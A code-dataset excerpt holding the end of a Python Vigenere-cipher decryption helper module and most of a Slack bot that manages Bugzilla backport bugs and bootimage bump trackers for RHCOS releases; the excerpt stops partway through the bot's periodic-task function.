find_change_in_key(old_key, new_key):\n for i in range(len(old_key)):\n if old_key[i] != new_key[i]:\n return i\n\n\ndef add_gram_to_frequency_change(gram, frequencies_change):\n if not gram:\n return\n try:\n frequencies_change[gram] += 1\n except KeyError:\n frequencies_change[gram] = 1\n\n\ndef subtract_gram_from_frequency_change(gram, frequencies_change):\n if not gram:\n return\n try:\n frequencies_change[gram] -= 1\n except KeyError:\n frequencies_change[gram] = -1\n\n\ndef get_bigrams_in_coords(text, i):\n bigrams = []\n if i == 0 and is_word_end(text, -1):\n beginning = text.stripped_part[text.ends_of_words[-1]]\n bigrams.append(beginning[-1] + text[i])\n if not is_word_end(text, i) and i + 1 < len(text):\n bigrams.append(text[i]+text[i+1])\n return bigrams\n stripped_index = text.ends_of_words[i]\n if text.stripped_part[stripped_index]:\n bigrams.append(text[i] + text.stripped_part[stripped_index][0])\n if i + 1 < len(text):\n bigrams.append(text.stripped_part[stripped_index][-1] + text[i+1])\n return bigrams\n\n\ndef expected_value(log_frequencies, text_length):\n normalizer = 0\n expected = 0\n for i in log_frequencies:\n normalizer += exp(log_frequencies[i])\n for i in log_frequencies:\n expected += log_frequencies[i]*exp(log_frequencies)\n return (expected/normalizer)*text_length\n\n\ndef consistency_vigenere(guessed_key, real_key, alphabet):\n guessed_copy = guessed_key[:]\n real_copy = real_key[:]\n while len(guessed_copy) != len(real_copy):\n if len(guessed_copy) > len(real_copy):\n real_copy += real_key\n else:\n guessed_copy += guessed_key\n accuracy = 0\n for i in range(len(guessed_copy)):\n if not (guessed_copy[i] - real_copy[i]) % alphabet.length:\n accuracy += 1\n\n return accuracy/len(guessed_copy)\n\n\ndef consistency_vigenere_extended(guessed_key, real_key, alphabet):\n guessed_copy = guessed_key[:]\n real_copy = real_key[:]\n while len(guessed_copy) != len(real_copy):\n if len(guessed_copy) > len(real_copy):\n real_copy += real_key\n else:\n guessed_copy += guessed_key\n accuracy = 0\n for i in range(len(guessed_copy)):\n if not (guessed_copy[i][0] - real_copy[i][0]) % alphabet.length and \\\n not (guessed_copy[i][1] - real_copy[i][1]) % alphabet.length:\n accuracy += 1\n return accuracy/len(guessed_copy)\n\n\ndef consistency(guessed_key, real_key, alphabet):\n try:\n return consistency_vigenere(guessed_key, real_key, alphabet)\n except TypeError:\n return consistency_vigenere_extended(guessed_key, real_key, alphabet)\n\n\ndef get_piece_on_i_coordinate(text, i, key_length):\n piece = []\n for coord in range(i, len(text), key_length):\n piece.append(text[coord])\n return piece\n","sub_path":"decryption_problem/common/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":7050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"472025044","text":"#!/usr/bin/python3\n#\n# Apache 2.0 license\n\nimport argparse\nimport bugzilla\nfrom collections import OrderedDict\nfrom dotted_dict import DottedDict\nfrom functools import cached_property, reduce, wraps\nimport itertools\nimport os\nfrom slack_sdk import WebClient\nfrom slack_sdk.socket_mode import SocketModeClient\nfrom slack_sdk.socket_mode.response import SocketModeResponse\nimport sqlite3\nimport time\nimport threading\nimport traceback\nimport yaml\n\nISSUE_LINK = 'https://github.com/coreos/rhcosbot/issues'\nHELP = f'''\nI understand these commands:\n%commands%\n\nBug statuses:\n:bugzilla: *NEW, ASSIGNED*\n:branch: POST\n:test_tube: POST & in RHCOS build & awaiting verification\n:large_green_circle: _POST & in RHCOS build & verified_\n:checkyes: ~MODIFIED, ON_QA, VERIFIED, CLOSED~\n:thinking_face: ¿Other?\n\nReport problems <{ISSUE_LINK}|here>.\n'''\n\n\nbootimage_creation_lock = threading.Lock()\n\n\ndef escape(message):\n '''Escape a string for inclusion in a Slack message.'''\n # https://api.slack.com/reference/surfaces/formatting#escaping\n map = {\n '&': '&',\n '<': '<',\n '>': '>',\n }\n return reduce(lambda s, p: s.replace(p[0], p[1]), map.items(), message)\n\n\nclass Database:\n def __init__(self, config):\n self._db = sqlite3.connect(config.database)\n with self:\n ver = self._db.execute('pragma user_version').fetchone()[0]\n if ver < 1:\n self._db.execute('create table events '\n '(added integer not null, '\n 'channel text not null, '\n 'timestamp text not null)')\n self._db.execute('create unique index events_unique '\n 'on events (channel, timestamp)')\n self._db.execute('pragma user_version = 1')\n\n def __enter__(self):\n '''Start a database transaction.'''\n self._db.__enter__()\n return self\n\n def __exit__(self, exc_type, exc_value, tb):\n '''Commit a database transaction.'''\n if exc_type in (HandledError, Fail):\n # propagate exception but commit anyway\n self._db.__exit__(None, None, None)\n return False\n return self._db.__exit__(exc_type, exc_value, tb)\n\n def add_event(self, channel, ts):\n '''Return False if the event is already present.'''\n try:\n self._db.execute('insert into events (added, channel, timestamp) '\n 'values (?, ?, ?)', (int(time.time()), channel, ts))\n return True\n except sqlite3.IntegrityError:\n return False\n\n def prune_events(self, max_age=3600):\n self._db.execute('delete from events where added < ?',\n (int(time.time() - max_age),))\n\n\nclass HandledError(Exception):\n '''An exception which should just be swallowed.'''\n pass\n\n\nclass Fail(Exception):\n '''An exception with a message that should be displayed to the user.'''\n pass\n\n\nclass Release:\n '''One release specification from the config.'''\n\n def __init__(self, config_struct):\n self.label = config_struct.label\n self.version = config_struct.bz_version\n self.target = config_struct.bz_target\n self.aliases = config_struct.get('bz_target_aliases', [])\n\n def __repr__(self):\n return f'<{self.__class__.__name__} {self.label}>'\n\n @property\n def targets(self):\n return [self.target] + self.aliases\n\n\nclass Releases(OrderedDict):\n '''Release specifications from the config, keyed by the label.'''\n\n @classmethod\n def from_config(cls, config):\n ret = cls()\n targets = set()\n for struct in config.releases:\n rel = Release(struct)\n ret[rel.label] = rel\n # Validate that there are no duplicate targets\n for target in [rel.target] + rel.aliases:\n if target in targets:\n raise ValueError(f'Duplicate target version \"{target}\"')\n targets.add(target)\n return ret\n\n @property\n def current(self):\n '''Return the current release.'''\n return next(iter(self.values()))\n\n @property\n def previous(self):\n '''Return previous releases.'''\n ret = self.copy()\n ret.popitem(last=False)\n return ret\n\n def at_least(self, label):\n '''Return all releases >= the specified label, or all releases if\n no label is specified.'''\n if label is None:\n return self.copy()\n ret = self.__class__()\n for rel in self.values():\n ret[rel.label] = rel\n if rel.label == label:\n return ret\n raise KeyError(label)\n\n @cached_property\n def by_target(self):\n '''Return a map from target to Release.'''\n ret = {}\n for rel in self.values():\n ret[rel.target] = rel\n for alias in rel.aliases:\n ret[alias] = rel\n return ret\n\n\nclass Bugzilla:\n '''Wrapper class for accessing Bugzilla.'''\n\n # Some standard BZ fields that we usually want\n DEFAULT_FIELDS = [\n 'cf_devel_whiteboard',\n 'cf_verified',\n 'component',\n 'keywords',\n 'product',\n 'summary',\n 'status',\n 'target_release',\n ]\n\n BOOTIMAGE_WHITEBOARD = 'bootimage'\n # Can't use hyphens or underscores, since those count as a word boundary\n BOOTIMAGE_BUG_WHITEBOARD = 'bootimageNeeded'\n BOOTIMAGE_BUG_BUILT_WHITEBOARD = 'imageBuilt'\n\n BOOTIMAGE_BUG_VERIFIED = 'Tested'\n\n def __init__(self, config):\n self.api = bugzilla.Bugzilla(config.bugzilla,\n api_key=config.bugzilla_key, force_rest=True)\n self._config = config\n\n def getbug(self, desc, fields=[]):\n '''Query Bugzilla for a bug. desc can be a bug number, or a string\n with a bug number, or a BZ URL with optional anchor.'''\n\n # Convert desc to integer\n if isinstance(desc, str):\n # Slack puts URLs inside <>.\n try:\n bz = int(desc.replace(self._config.bugzilla_bug_url, '', 1). \\\n split('#')[0]. \\\n strip(' <>'))\n except ValueError:\n raise Fail(\"Invalid bug number.\")\n else:\n bz = desc\n\n # Query Bugzilla\n fields = fields + self.DEFAULT_FIELDS\n try:\n bug = self.api.getbug(bz, include_fields=fields)\n except IndexError:\n raise Fail(f\"Couldn't find bug {bz}.\")\n\n # Basic validation that it's safe to operate on this bug\n if bug.product != self._config.bugzilla_product:\n raise Fail(f'Bug {bz} has unexpected product \"{escape(bug.product)}\".')\n if bug.component != self._config.bugzilla_component:\n raise Fail(f'Bug {bz} has unexpected component \"{escape(bug.component)}\".')\n\n return bug\n\n def query(self, fields=[], whiteboard=None, extra={},\n default_component=True, **kwargs):\n '''Search Bugzilla. kwargs are passed to build_query(). Arguments\n not supported by build_query can be passed in extra and will be\n applied to the query dict afterward. Limit to configured product/\n component unless default_component is False.'''\n\n if default_component:\n kwargs.update({\n 'product': self._config.bugzilla_product,\n 'component': self._config.bugzilla_component,\n })\n query = self.api.build_query(\n include_fields=fields + self.DEFAULT_FIELDS,\n **kwargs\n )\n query.update(extra)\n if whiteboard is not None:\n query.update({\n 'f1': 'cf_devel_whiteboard',\n 'o1': 'allwords',\n 'v1': whiteboard,\n })\n return sorted(self.api.query(query), key=lambda b: b.id)\n\n def get_backports(self, bug, fields=[], min_ver=None):\n '''Follow the backport bug chain from the specified Bug, until we\n reach min_ver or run out of bugs or configured releases. Return a\n list of Bugs from newest to oldest release, including the specified\n Bugzilla fields. Fail if the specified BZ doesn't match the\n configured current release.'''\n\n # Check bug invariants\n bug_target = bug.target_release[0]\n if bug_target not in self._config.releases.current.targets:\n raise Fail(f'Bug {bug.id} targets release \"{escape(bug_target)}\" but latest release is {self._config.releases.current.target}.')\n\n # Walk each backport version\n cur_bug = bug\n ret = []\n for rel in self._config.releases.at_least(min_ver).previous.values():\n # Check for an existing clone with this target release or\n # one of its aliases\n candidates = self.query(\n target_release=rel.targets,\n fields=fields,\n extra={\n 'cf_clone_of': cur_bug.id,\n },\n )\n if len(candidates) > 1:\n bzlist = ', '.join(str(b.id) for b in candidates)\n raise Fail(f\"Found multiple clones of bug {cur_bug.id} with target release {rel.label}: {bzlist}\")\n if len(candidates) == 0:\n break\n cur_bug = candidates[0]\n ret.append(cur_bug)\n return ret\n\n def get_bootimages(self, status='ASSIGNED', fields=[]):\n '''Get a map from release label to bootimage bump bug with the\n specified status. Fail if any release has multiple bootimage bumps\n with that status. Include the specified bug fields.'''\n\n bugs = self.query(fields=fields, status=status,\n whiteboard=self.BOOTIMAGE_WHITEBOARD)\n ret = {}\n for bug in bugs:\n try:\n rel = self._config.releases.by_target[bug.target_release[0]]\n except KeyError:\n # unknown target release; ignore\n continue\n if rel.label in ret:\n raise Fail(f'Found multiple bootimage bumps for release {rel.label} with status {status}: {ret[rel.label].id}, {bug.id}.')\n ret[rel.label] = bug\n return ret\n\n def get_bootimage_bugs(self, bootimage, release, fields=[], built=False,\n **kwargs):\n '''Find bugs attached to the specified bootimage bump and release,\n which must match. We normally refuse to create bootimage bugs\n outside our component, but if they've been created manually, detect\n them anyway so bugs don't get missed. If built is True, only find\n bugs that are marked built.'''\n whiteboard = self.BOOTIMAGE_BUG_WHITEBOARD\n if built:\n whiteboard += ' ' + self.BOOTIMAGE_BUG_BUILT_WHITEBOARD\n return self.query(\n dependson=[bootimage.id],\n target_release=release.targets,\n fields=fields,\n whiteboard=whiteboard,\n default_component=False,\n **kwargs\n )\n\n @staticmethod\n def whiteboard(bug):\n '''Return the words in the dev whiteboard for the specified Bug.'''\n return bug.cf_devel_whiteboard.split()\n\n def create_bootimage(self, release, fields=[]):\n '''Create or look up a bootimage for the specified release and\n return a bug including the specified fields, and a boolean\n indicating whether the bootimage was newly created.'''\n # Lock to make sure multiple Slack commands don't race to create the\n # bug\n with bootimage_creation_lock:\n created = False\n # Double-check for the BZ under the creation lock\n bugs = self.query(\n status='ASSIGNED',\n whiteboard=self.BOOTIMAGE_WHITEBOARD,\n target_release=release.targets\n )\n if len(bugs) > 1:\n raise Fail(f'Found multiple existing bootimage bumps for release {release.label} with status ASSIGNED: {\", \".join(str(b.id) for b in bugs)}')\n elif bugs:\n # Reuse existing bug\n bz = bugs[0].id\n else:\n # Create new bug\n desc = f'Tracker bug for bootimage bump in {release.label}. This bug should block bugs which need a bootimage bump to fix.'\n # Find the most recent bump for this release, if any.\n # Use the one with the highest ID.\n previous = self.query(\n status=['POST', 'MODIFIED', 'ON_QA', 'VERIFIED', 'RELEASE_PENDING', 'CLOSED'],\n whiteboard=self.BOOTIMAGE_WHITEBOARD,\n target_release=release.targets,\n )\n if previous:\n previous_id = list(b.id for b in previous)[-1]\n desc += f'\\n\\nThe previous bump was bug {previous_id}.'\n info = self.api.build_createbug(\n product=self._config.bugzilla_product,\n component=self._config.bugzilla_component,\n version=release.version,\n summary=f'[{release.label}] Bootimage bump tracker',\n description=desc,\n cc=self._config.get('bugzilla_cc', []),\n assigned_to=self._config.bugzilla_assignee,\n severity=self._config.get('bugzilla_severity', 'medium'),\n status='ASSIGNED',\n target_release=release.target,\n )\n info['cf_devel_whiteboard'] = self.BOOTIMAGE_WHITEBOARD\n if previous:\n info['cf_clone_of'] = previous_id\n bz = self.api.createbug(info).id\n created = True\n return self.getbug(bz, fields=fields), created\n\n def ensure_bootimage_bug_allowed(self, bug):\n '''Raise Fail if the bug must not be added to a bootimage bump.'''\n deny_keywords = self._config.get('bootimage_deny_keywords', [])\n kw = set(deny_keywords) & set(bug.keywords)\n if kw:\n raise Fail(f'By policy, this bug cannot be added to a bootimage bump because of keywords: *{escape(\", \".join(kw))}*')\n\n def update_bootimage_bug_status(self, bootimage_status, bootimage_bug_status,\n new_bootimage_bug_status, comment, built=False):\n '''Find all bootimage bugs in status bootimage_bug_status (list) and\n associated with a bootimage in status bootimage_status (singular),\n then move them to new_bootimage_bug_status with the specified comment,\n which supports the format fields \"bootimage\" (bootimage BZ ID) and\n \"status\" (bootimage BZ status). If built is True, modify only\n bootimage bugs which have been marked built.'''\n bootimages = self.get_bootimages(status=bootimage_status)\n for label, rel in self._config.releases.items():\n try:\n bootimage = bootimages[label]\n except KeyError:\n continue\n bugs = self.get_bootimage_bugs(bootimage, rel,\n status=bootimage_bug_status, built=built)\n if not bugs:\n continue\n update = self.api.build_update(\n status=new_bootimage_bug_status,\n comment=comment.format(\n bootimage=bootimage.id,\n status=bootimage.status\n ),\n )\n self.api.update_bugs([b.id for b in bugs], update)\n\n\ndef report_errors(f):\n '''Decorator that sends exceptions to an administrator via Slack DM\n and then swallows them. The first argument of the function must be\n the config.'''\n import json, requests, socket, urllib.error\n @wraps(f)\n def wrapper(config, *args, **kwargs):\n def send(message):\n try:\n client = WebClient(token=config.slack_token)\n channel = client.conversations_open(users=[config.error_notification])['channel']['id']\n client.chat_postMessage(channel=channel, text=message)\n except Exception:\n traceback.print_exc()\n try:\n return f(config, *args, **kwargs)\n except Fail as e:\n # Nothing else caught this; just report the error string.\n send(str(e))\n except HandledError:\n pass\n except (json.JSONDecodeError, requests.ConnectionError, requests.HTTPError, requests.ReadTimeout) as e:\n # Exception type leaked from the bugzilla API. Assume transient\n # network problem; don't send message.\n print(e)\n except (socket.timeout, urllib.error.URLError) as e:\n # Exception type leaked from the slack_sdk API. Assume transient\n # network problem; don't send message.\n print(e)\n except Exception:\n send(f'Caught exception:\\n```\\n{traceback.format_exc()}```')\n return wrapper\n\n\nclass Registry(type):\n '''Metaclass that creates a dict of functions registered with the\n register decorator.'''\n\n def __new__(cls, name, bases, attrs):\n cls = super().__new__(cls, name, bases, attrs)\n registry = []\n for f in attrs.values():\n command = getattr(f, 'command', None)\n if command is not None:\n registry.append((command, f))\n registry.sort(key=lambda t: t[1].doc_order)\n cls._registry = OrderedDict(registry)\n return cls\n\n\ndef register(command, args=(), doc=None, fast=False, complete=True):\n '''Decorator that registers the subcommand handled by a function.'''\n def decorator(f):\n f.command = command\n f.args = args\n f.doc = doc\n f.doc_order = time.time() # hack alert!\n f.fast = fast\n f.complete = complete\n return f\n return decorator\n\n\nclass CommandHandler(metaclass=Registry):\n '''Wrapper class to handle a single event in a thread. Creates its own\n network clients for thread safety.'''\n\n def __init__(self, config, event):\n self._config = config\n self._event = event\n self._client = WebClient(token=config.slack_token)\n self._bz = Bugzilla(config)\n self._called = False\n\n def __call__(self):\n assert not self._called\n self._called = True\n\n message = self._event.text.replace(f'<@{self._config.bot_id}>', '').strip()\n words = message.split()\n # Match the longest available subcommand\n for count in range(len(words), 0, -1):\n f = self._registry.get(tuple(words[:count]))\n if f is not None:\n @report_errors\n def wrapper(_config):\n if not f.fast:\n self._react('hourglass_flowing_sand')\n try:\n args = words[count:]\n if len(args) != len(f.args):\n if f.args:\n argdesc = ' '.join(f'<{a}>' for a in f.args)\n raise Fail(f'Bad arguments; expect `{argdesc}`.')\n else:\n raise Fail('This command takes no arguments.')\n f(self, *args)\n except Fail as e:\n self._react('x')\n self._reply(str(e))\n # convert to HandledError to indicate that we've\n # displayed this message\n raise HandledError()\n except Exception:\n self._react('boom')\n raise\n finally:\n if not f.fast:\n self._client.reactions_remove(\n channel=self._event.channel,\n timestamp=self._event.ts,\n name='hourglass_flowing_sand'\n )\n if f.complete:\n self._react('ballot_box_with_check')\n # report_errors() requires the config to be the first argument\n threading.Thread(target=wrapper, name=f.__name__,\n args=(self._config,)).start()\n return\n\n # Tried all possible subcommand lengths, found nothing in registry\n self._reply(f\"I didn't understand that. Try `<@{self._config.bot_id}> help`\")\n self._react('x')\n\n def _react(self, name):\n '''Add an emoji to a command mention.'''\n self._client.reactions_add(channel=self._event.channel,\n name=name, timestamp=self._event.ts)\n\n def _reply(self, message, at_user=True):\n '''Reply to a command mention.'''\n if at_user:\n message = f\"<@{self._event.user}> {message}\"\n self._client.chat_postMessage(channel=self._event.channel,\n text=message,\n # start a new thread or continue the existing one\n thread_ts=self._event.get('thread_ts', self._event.ts),\n # disable Shodan link unfurls\n unfurl_links=False, unfurl_media=False)\n\n def _bug_link(self, bug, text=None, icon=False):\n '''Format a Bug into a Slack link.'''\n def link(format):\n start, icon_, stop = format[0].strip(), f':{format[1:-1]}: ' if icon else '', format[-1].strip()\n text_ = str(text) if text else bug.summary\n return f'{start}<{self._config.bugzilla_bug_url}{str(bug.id)}|{icon_}{escape(text_)}>{stop}'\n if bug.status in ('NEW', 'ASSIGNED'):\n return link('*bugzilla*')\n if bug.status == 'POST':\n if self._bz.BOOTIMAGE_BUG_BUILT_WHITEBOARD in self._bz.whiteboard(bug):\n if self._bz.BOOTIMAGE_BUG_VERIFIED in bug.cf_verified:\n return link('_large_green_circle_')\n return link(' test_tube ')\n return link(' branch ')\n if bug.status in ('MODIFIED', 'ON_QA', 'VERIFIED', 'CLOSED'):\n return link('~checkyes~')\n return link('¿thinking_face?')\n\n @register(('backport',), ('bz-url-or-id', 'minimum-release'),\n doc='ensure there are backport bugs down to minimum-release')\n def _backport(self, desc, min_ver):\n '''Ensure the existence of backport bugs for the specified BZ,\n in all releases >= the specified one.'''\n # Fail if release is invalid or current\n if min_ver not in self._config.releases:\n raise Fail(f'Unknown release \"{escape(min_ver)}\".')\n if min_ver == self._config.releases.current.label:\n raise Fail(f\"{escape(min_ver)} is the current release; can't backport.\")\n\n # Look up the bug. This validates the product and component.\n bug = self._bz.getbug(desc, [\n 'assigned_to',\n 'groups',\n 'severity',\n 'version',\n ])\n if bug.severity == 'unspecified':\n # Eric-Paris-bot will unset the target version without a severity\n raise Fail(\"Bug severity is not set; can't backport.\")\n\n # Query existing backport bugs\n backports = self._bz.get_backports(bug, min_ver=min_ver)\n\n # Query bootimages if needed\n need_bootimage = self._bz.BOOTIMAGE_BUG_WHITEBOARD in self._bz.whiteboard(bug)\n if need_bootimage:\n self._bz.ensure_bootimage_bug_allowed(bug)\n bootimages = self._bz.get_bootimages(fields=['blocks'])\n\n # First, do checks\n created_bootimages = []\n for rel in list(self._config.releases.at_least(min_ver).previous.values())[len(backports):]:\n if need_bootimage:\n if rel.label not in bootimages:\n bootimages[rel.label], created = self._bz.create_bootimage(rel, fields=['blocks'])\n if created:\n created_bootimages.append(self._bug_link(bootimages[rel.label], rel.label))\n groups = bug.groups\n allow_groups = self._config.get('backport_allow_groups', [])\n if allow_groups:\n groups = list(set(groups) & set(allow_groups))\n if bug.groups and not groups:\n raise Fail(\"Cannot add any of the bug's groups to new clones, and refusing to create a public bug.\")\n\n # Walk each backport version\n cur_bug = bug\n later_rel = self._config.releases.current\n created_bugs = []\n all_bugs = []\n for rel in self._config.releases.at_least(min_ver).previous.values():\n if backports:\n # Have an existing bug\n cur_bug = backports.pop(0)\n else:\n # Make a new one\n depends = [cur_bug.id]\n if need_bootimage:\n depends.append(bootimages[rel.label].id)\n info = self._bz.api.build_createbug(\n product=bug.product,\n component=bug.component,\n version=bug.version,\n summary=f'[{rel.label}] {bug.summary}',\n description=f'Backport the fix for bug {bug.id} to {rel.label}.',\n assigned_to=bug.assigned_to,\n keywords=bug.keywords,\n depends_on=depends,\n groups=groups,\n severity=bug.severity,\n status='ASSIGNED',\n target_release=rel.target\n )\n info['cf_clone_of'] = cur_bug.id\n if need_bootimage:\n info['cf_devel_whiteboard'] = self._bz.BOOTIMAGE_BUG_WHITEBOARD\n bz = self._bz.api.createbug(info).id\n cur_bug = self._bz.getbug(bz)\n created_bugs.append(self._bug_link(cur_bug, rel.label))\n if need_bootimage:\n # Ensure this bootimage bump is blocked by the one for\n # the more recent release. Thus we dynamically track\n # bootimage dependencies rather than imposing a fixed\n # relationship between bumps in adjacent releases. For\n # example, a bump for 4.6 may coalesce the contents of\n # two 4.7 bumps.\n if bootimages[rel.label].id not in bootimages[later_rel.label].blocks:\n info = self._bz.api.build_update(\n blocks_add=[bootimages[rel.label].id],\n )\n self._bz.api.update_bugs([bootimages[later_rel.label].id], info)\n all_bugs.append(self._bug_link(cur_bug, rel.label))\n later_rel = rel\n\n created_bugs.reverse()\n all_bugs.reverse()\n message = ''\n if created_bootimages:\n message += f'Created bootimage trackers: {\", \".join(created_bootimages)}\\n'\n if created_bugs:\n message += f'Created bugs: {\", \".join(created_bugs)}\\n'\n message += f'All backports: {\", \".join(all_bugs)}'\n self._reply(message, at_user=False)\n\n @register(('bootimage', 'create'), ('release',),\n doc='create bootimage bump (usually done automatically as needed)')\n def _bootimage_create(self, label):\n try:\n rel = self._config.releases[label]\n except KeyError:\n raise Fail(f'Unknown release \"{escape(label)}\".')\n bug, created = self._bz.create_bootimage(rel)\n link = self._bug_link(bug, rel.label)\n self._reply(f'{\"Created\" if created else \"Existing\"} bootimage tracker: {link}', at_user=False)\n\n @register(('bootimage', 'list'), doc='list upcoming bootimage bumps')\n def _bootimage_list(self):\n '''List bootimage bump BZs.'''\n\n sections = (\n ('Planned bootimage bumps', 'ASSIGNED'),\n ('Pending bootimage bumps', 'POST'),\n )\n report = []\n for caption, status in sections:\n bootimages = self._bz.get_bootimages(status=status)\n if not bootimages:\n continue\n report.append(f'\\n*_{caption}_*:')\n for label, rel in self._config.releases.items():\n try:\n bootimage = bootimages[label]\n except KeyError:\n # nothing for this release\n continue\n bugs = self._bz.get_bootimage_bugs(bootimage, rel)\n report.append('\\n*For* ' + self._bug_link(bootimage, label) + ':')\n for bug in bugs:\n report.append(self._bug_link(bug, icon=True))\n if not bugs:\n report.append('_no bugs_')\n if not report:\n report.append('No bootimage bumps.')\n self._reply('\\n'.join(report), at_user=False)\n\n @register(('bootimage', 'bug', 'add'), ('bz-url-or-id',),\n doc='add a bug and its backports to planned bootimage bumps')\n def _bootimage_bug_add(self, desc):\n '''Add a bug and its backports to planned bootimage bumps.'''\n # Look up the bug. This validates the product and component.\n bug = self._bz.getbug(desc)\n self._bz.ensure_bootimage_bug_allowed(bug)\n\n # Get planned bootimage bumps\n bootimages = self._bz.get_bootimages(fields=['blocks'])\n\n # Get bug and its backports\n bugs = [bug] + self._bz.get_backports(bug)\n\n # First, do checks\n created_bootimages = []\n for rel, cur_bug in zip(self._config.releases.values(), bugs):\n assert cur_bug.target_release[0] in rel.targets\n if rel.label not in bootimages:\n bootimages[rel.label], created = self._bz.create_bootimage(rel, fields=['blocks'])\n if created:\n created_bootimages.append(self._bug_link(bootimages[rel.label], rel.label))\n if self._bz.BOOTIMAGE_BUG_WHITEBOARD not in self._bz.whiteboard(cur_bug):\n if cur_bug.status not in ('NEW', 'ASSIGNED', 'POST'):\n raise Fail(f'Refusing to add bug {cur_bug.id} in {cur_bug.status} to bootimage bump.')\n\n # Add to bootimage bumps; generate report\n later_rel = None\n added_bugs = []\n all_bugs = []\n for rel, cur_bug in zip(self._config.releases.values(), bugs):\n link = self._bug_link(cur_bug, rel.label)\n all_bugs.append(link)\n if self._bz.BOOTIMAGE_BUG_WHITEBOARD not in self._bz.whiteboard(cur_bug):\n bootimage = bootimages[rel.label]\n update = self._bz.api.build_update(\n depends_on_add=[bootimage.id],\n )\n update['cf_devel_whiteboard'] = f'{cur_bug.cf_devel_whiteboard} {self._bz.BOOTIMAGE_BUG_WHITEBOARD}'\n self._bz.api.update_bugs([cur_bug.id], update)\n added_bugs.append(link)\n if later_rel is not None:\n # Ensure this bootimage bump is blocked by the one for\n # the more recent release. Thus we dynamically track\n # bootimage dependencies rather than imposing a fixed\n # relationship between bumps in adjacent releases. For\n # example, a bump for 4.6 may coalesce the contents of\n # two 4.7 bumps.\n if bootimages[rel.label].id not in bootimages[later_rel.label].blocks:\n info = self._bz.api.build_update(\n blocks_add=[bootimages[rel.label].id],\n )\n self._bz.api.update_bugs([bootimages[later_rel.label].id], info)\n later_rel = rel\n\n # Show report\n added_bugs.reverse()\n all_bugs.reverse()\n message = ''\n if created_bootimages:\n message += f'Created bootimage trackers: {\", \".join(created_bootimages)}\\n'\n if added_bugs:\n message += f'Added to bootimage: {\", \".join(added_bugs)}\\n'\n message += f'All bugs: {\", \".join(all_bugs)}'\n self._reply(message, at_user=False)\n\n @register(('bootimage', 'bug', 'built'), ('bz-url-or-id',),\n doc='mark a bug landed in an RHCOS build and ready for QE')\n def _bootimage_bug_built(self, desc):\n # Look up the bug. This validates the product and component.\n bug = self._bz.getbug(desc)\n self._bz.ensure_bootimage_bug_allowed(bug)\n\n if self._bz.BOOTIMAGE_BUG_WHITEBOARD not in self._bz.whiteboard(bug):\n raise Fail(f'Bug {bug.id} is not attached to a bootimage bump.')\n if bug.status not in ('NEW', 'ASSIGNED', 'POST'):\n raise Fail(f'Refusing to mark bug {bug.id} built from status {bug.status}.')\n if self._bz.BOOTIMAGE_BUG_BUILT_WHITEBOARD not in self._bz.whiteboard(bug):\n update = self._bz.api.build_update(\n status='POST',\n flags=[\n {'name': 'reviewed-in-sprint', 'status': '+'},\n ],\n comment=\"This bug has been reported fixed in a new RHCOS build and is ready for QE verification. To mark the bug verified, set the Verified field to Tested. This bug will automatically move to MODIFIED once the fix has landed in a new bootimage.\",\n )\n update['cf_devel_whiteboard'] = f'{bug.cf_devel_whiteboard} {self._bz.BOOTIMAGE_BUG_BUILT_WHITEBOARD}'\n self._bz.api.update_bugs([bug.id], update)\n\n @register(('bootimage', 'bug', 'list'),\n doc='list bugs on upcoming bootimage bumps')\n def _bootimage_bug_list(self):\n sections = (\n ('Planned bootimage bumps', 'ASSIGNED'),\n ('Pending bootimage bumps', 'POST'),\n )\n report = []\n for caption, status in sections:\n bootimages = self._bz.get_bootimages(status=status)\n progenitors = {} # progenitor bug ID -> Bug\n groups = {} # progenitor bug ID -> [bug links]\n canonical = {} # backport bug ID -> progenitor bug ID\n for label, rel in self._config.releases.items():\n try:\n bootimage = bootimages[label]\n except KeyError:\n # nothing for this release\n continue\n bugs = self._bz.get_bootimage_bugs(bootimage, rel,\n fields=['cf_clone_of'])\n for bug in bugs:\n # Find the progenitor from this bug's parent. Maybe\n # there is none, and we're the progenitor.\n progenitor = canonical.get(bug.cf_clone_of, bug.id)\n # Add the next link in the ancestry chain\n canonical[bug.id] = progenitor\n # If we're the progenitor, record bug details\n progenitors.setdefault(progenitor, bug)\n # Associate this bug's link with the progenitor\n groups.setdefault(progenitor, []).append(\n self._bug_link(bug, rel.label, icon=True)\n )\n if progenitors:\n report.append(f'\\n*_{caption}_*:')\n for bz, bug in sorted(progenitors.items()):\n report.append(f'• {escape(bug.summary)} [{\", \".join(groups[bz])}]')\n if not report:\n report.append('No bootimage bumps.')\n self._reply('\\n'.join(report), at_user=False)\n\n @register(('release', 'list'), doc='list known releases',\n fast=True, complete=False)\n def _release_list(self):\n report = []\n for rel in reversed(self._config.releases.values()):\n report.append(f'{rel.label}: *{rel.target}* {\" \".join(rel.aliases)}')\n body = \"\\n\".join(report)\n self._reply(f'Release: *default-target* other-targets\\n{body}\\n', at_user=False)\n\n @register(('ping',), doc='check whether the bot is running properly',\n fast=True)\n def _ping(self):\n # Check Bugzilla connectivity\n try:\n if not self._bz.api.logged_in:\n raise Exception('Not logged in.')\n except Exception:\n # Swallow exception details and just report the failure\n raise Fail('Cannot contact Bugzilla.')\n\n @register(('help',), doc='print this message', fast=True, complete=False)\n def _help(self):\n commands = []\n for command, f in self._registry.items():\n if f.doc is not None:\n commands.append('`{}{}{}` - {}'.format(\n ' '.join(command),\n ' ' if f.args else '',\n ' '.join((f'<{a}>' for a in f.args)),\n f.doc\n ))\n self._reply(HELP.replace('%commands%', '\\n'.join(commands)),\n at_user=False)\n\n @register(('throw',), fast=True, complete=False)\n def _throw(self):\n # undocumented\n raise Exception(f'Throwing exception as requested by <@{self._event.user}>')\n\n\n@report_errors\ndef process_event(config, socket_client, req):\n '''Handler for a Slack event.'''\n payload = DottedDict(req.payload)\n\n if req.type == 'events_api' and payload.event.type == 'app_mention':\n if payload.event.channel != config.channel:\n # Don't even acknowledge events outside our channel, to\n # avoid interfering with separate instances in other\n # channels.\n return\n\n # Acknowledge the event, as required by Slack.\n resp = SocketModeResponse(envelope_id=req.envelope_id)\n socket_client.send_socket_mode_response(resp)\n\n with Database(config) as db:\n if not db.add_event(payload.event.channel, payload.event.event_ts):\n # When we ignore some events, Slack can send us duplicate\n # retries. Detect and ignore those after acknowledging.\n return\n\n CommandHandler(config, payload.event)()\n\n\n@report_errors\ndef periodic(config, db, bz, maintenance):\n '''Run periodic tasks.'''\n\n # Prune database\n if maintenance:\n with db:\n db.prune_events()\n\n # Find bugs 